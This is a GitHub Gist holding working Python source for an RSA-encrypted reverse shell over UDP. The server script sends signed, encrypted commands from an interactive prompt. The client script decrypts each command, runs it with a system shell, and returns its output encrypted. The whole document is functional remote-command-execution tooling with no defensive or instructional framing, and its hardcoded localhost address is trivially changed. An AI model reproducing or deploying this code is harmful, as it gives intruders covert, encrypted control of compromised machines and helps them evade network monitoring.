Skip to content

Instantly share code, notes, and snippets.

@0x07CB
Created February 1, 2024 16:23
Show Gist options
  • Save 0x07CB/616279732a5757c1c69251275ab616d7 to your computer and use it in GitHub Desktop.
Save 0x07CB/616279732a5757c1c69251275ab616d7 to your computer and use it in GitHub Desktop.
Reverse Shell over UDP with RSA encryption
pyasn1==0.5.1
rsa==4.9
#coding: utf-8
import rsa
import socket
class UDP_Server:
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def close(self):
self.sock.close()
return self
def send_data(self, data, address):
self.sock.sendto(data, address)
return self
def recv_data(self, size):
return self.sock.recvfrom(size)
def bind(self):
self.sock.bind((self.host, self.port))
return self
class RSA_Communication:
def __init__(self, key_size=4096):
self.pubkey, self.privkey = rsa.newkeys(key_size)
def get_pubkey_PEM(self):
return self.pubkey.save_pkcs1('PEM')
def get_privkey_PEM(self):
return self.privkey.save_pkcs1('PEM')
def load_pubkey_PEM(self, keydata):
self.pubkey = rsa.PublicKey.load_pkcs1(keydata)
return self
def load_privkey_PEM(self, keydata):
self.privkey = rsa.PrivateKey.load_pkcs1(keydata)
return self
def encrypt(self, data):
if ( type(data) != bytes ):
data = data.encode('utf-8')
return rsa.encrypt(data, self.pubkey)
def decrypt(self, data):
if ( type(data) != bytes ):
data = data.encode('utf-8')
return rsa.decrypt(data, self.privkey)
class RSA_Signature:
def __init__(self, hash_method='SHA-1', key_size=4096):
self.hash_method = hash_method
self.key_size = key_size
def sign(self, data, privkey):
if ( type(data) != bytes ):
data = data.encode('utf-8')
return rsa.sign(data, rsa.PrivateKey.load_pkcs1(privkey), self.hash_method)
def verify(self, data, signature, pubkey):
if ( type(data) != bytes ):
data = data.encode('utf-8')
return rsa.verify(data, signature, rsa.PublicKey.load_pkcs1(pubkey))
def check_signature(self, data, signature, pubkey):
if ( type(data) != bytes ):
data = data.encode('utf-8')
try:
check_hash_algo = self.verify(data, signature, pubkey)
if ( check_hash_algo == self.hash_method ):
return True
else:
return False
except rsa.pkcs1.VerificationError:
return False
def main():
server = UDP_Server("127.0.0.1", 12345)
server.bind()
rsa_comm = RSA_Communication()
pubkey = rsa_comm.get_pubkey_PEM()
client_pubkey = None
client_address = None
print("Serveur en attente de connexion...")
client_pubkey, client_address = server.recv_data(1024)
print("Tentative de connexion entrante de: ", client_address)
print("Clé publique du client reçue.")
if ( type(client_pubkey) != bytes ):
client_pubkey = client_pubkey.encode('utf-8')
print("Connexion établie avec le client: ", client_address)
server.send_data(pubkey, client_address)
while True:
auth_sign = RSA_Signature('SHA-1',4096)
shell_command = input("shell>> ")
if 'terminate' in shell_command:
terminate = True
else:
terminate = False
if type(shell_command) != bytes:
shell_command = shell_command.encode('utf-8')
shell_command_signature = auth_sign.sign(shell_command,rsa_comm.get_privkey_PEM())
server.send_data(rsa.encrypt(shell_command, rsa.PublicKey.load_pkcs1(client_pubkey)), client_address)
server.send_data(shell_command_signature, client_address)
if terminate:
server.close()
break
crypt_shell_stdout, address = server.recv_data(1024)
signature_shell_stdout, address = server.recv_data(1024)
crypt_shell_stderr, address = server.recv_data(1024)
signature_shell_stderr, address_ = server.recv_data(1024)
shell_stdout = rsa_comm.decrypt(crypt_shell_stdout)
shell_stderr = rsa_comm.decrypt(crypt_shell_stderr)
if (address_ == address):
if ( auth_sign.check_signature(shell_stdout, signature_shell_stdout, client_pubkey) == True ) and ( auth_sign.check_signature(shell_stderr, signature_shell_stderr, client_pubkey) == True ):
print(shell_stdout.decode())
print(shell_stderr.decode())
if __name__ == "__main__":
main()
#coding: utf-8
import rsa
import socket
import subprocess
class UDP_Client:
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def close(self):
self.sock.close()
return self
def send_data(self, data, address):
self.sock.sendto(data, address)
return self
def recv_data(self, size):
return self.sock.recvfrom(size)
class RSA_Communication:
def __init__(self, key_size=4096):
self.pubkey, self.privkey = rsa.newkeys(key_size)
def get_pubkey_PEM(self):
return self.pubkey.save_pkcs1('PEM')
def get_privkey_PEM(self):
return self.privkey.save_pkcs1('PEM')
def load_pubkey_PEM(self, keydata):
self.pubkey = rsa.PublicKey.load_pkcs1(keydata)
return self
def load_privkey_PEM(self, keydata):
self.privkey = rsa.PrivateKey.load_pkcs1(keydata)
return self
def encrypt(self, data):
if ( type(data) != bytes ):
data = data.encode('utf-8')
return rsa.encrypt(data, self.pubkey)
def decrypt(self, data):
if ( type(data) != bytes ):
data = data.encode('utf-8')
return rsa.decrypt(data, self.privkey)
class RSA_Signature:
def __init__(self, hash_method='SHA-1', key_size=4096):
self.hash_method = hash_method
self.key_size = key_size
def sign(self, data, privkey):
if ( type(data) != bytes ):
data = data.encode('utf-8')
return rsa.sign(data, rsa.PrivateKey.load_pkcs1(privkey), self.hash_method)
def verify(self, data, signature, pubkey):
if ( type(data) != bytes ):
data = data.encode('utf-8')
return rsa.verify(data, signature, rsa.PublicKey.load_pkcs1(pubkey))
def check_signature(self, data, signature, pubkey):
if ( type(data) != bytes ):
data = data.encode('utf-8')
try:
check_hash_algo = self.verify(data, signature, pubkey)
if ( check_hash_algo == self.hash_method ):
return True
else:
return False
except rsa.pkcs1.VerificationError:
return False
def main():
rsa_comm = RSA_Communication()
pubkey = rsa_comm.get_pubkey_PEM()
client = UDP_Client("127.0.0.1", 12345)
client.send_data(pubkey, ("127.0.0.1", 12345))
server_pubkey, server_address = client.recv_data(1024)
while True:
auth_sign = RSA_Signature('SHA-1',4096)
encrypted_command, server_address = client.recv_data(1024)
command = rsa_comm.decrypt(encrypted_command).decode('utf-8')
signature_command, server_address_ = client.recv_data(1024)
if (server_address_ == server_address):
if ( auth_sign.check_signature(command, signature_command, server_pubkey) == True ):
if 'terminate' in command:
client.close()
break
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
clear_stdout, clear_stderr = CMD.stdout.read(), CMD.stderr.read()
encrypted_stdout = rsa.encrypt(clear_stdout, rsa.PublicKey.load_pkcs1(server_pubkey,'PEM'))
encrypted_stderr = rsa.encrypt(clear_stderr, rsa.PublicKey.load_pkcs1(server_pubkey,'PEM'))
signature_message = auth_sign.sign(clear_stdout,rsa_comm.get_privkey_PEM())
client.send_data(encrypted_stdout, server_address)
client.send_data(signature_message, server_address)
signature_message = auth_sign.sign(clear_stderr,rsa_comm.get_privkey_PEM())
client.send_data(encrypted_stderr, server_address)
client.send_data(signature_message, server_address)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment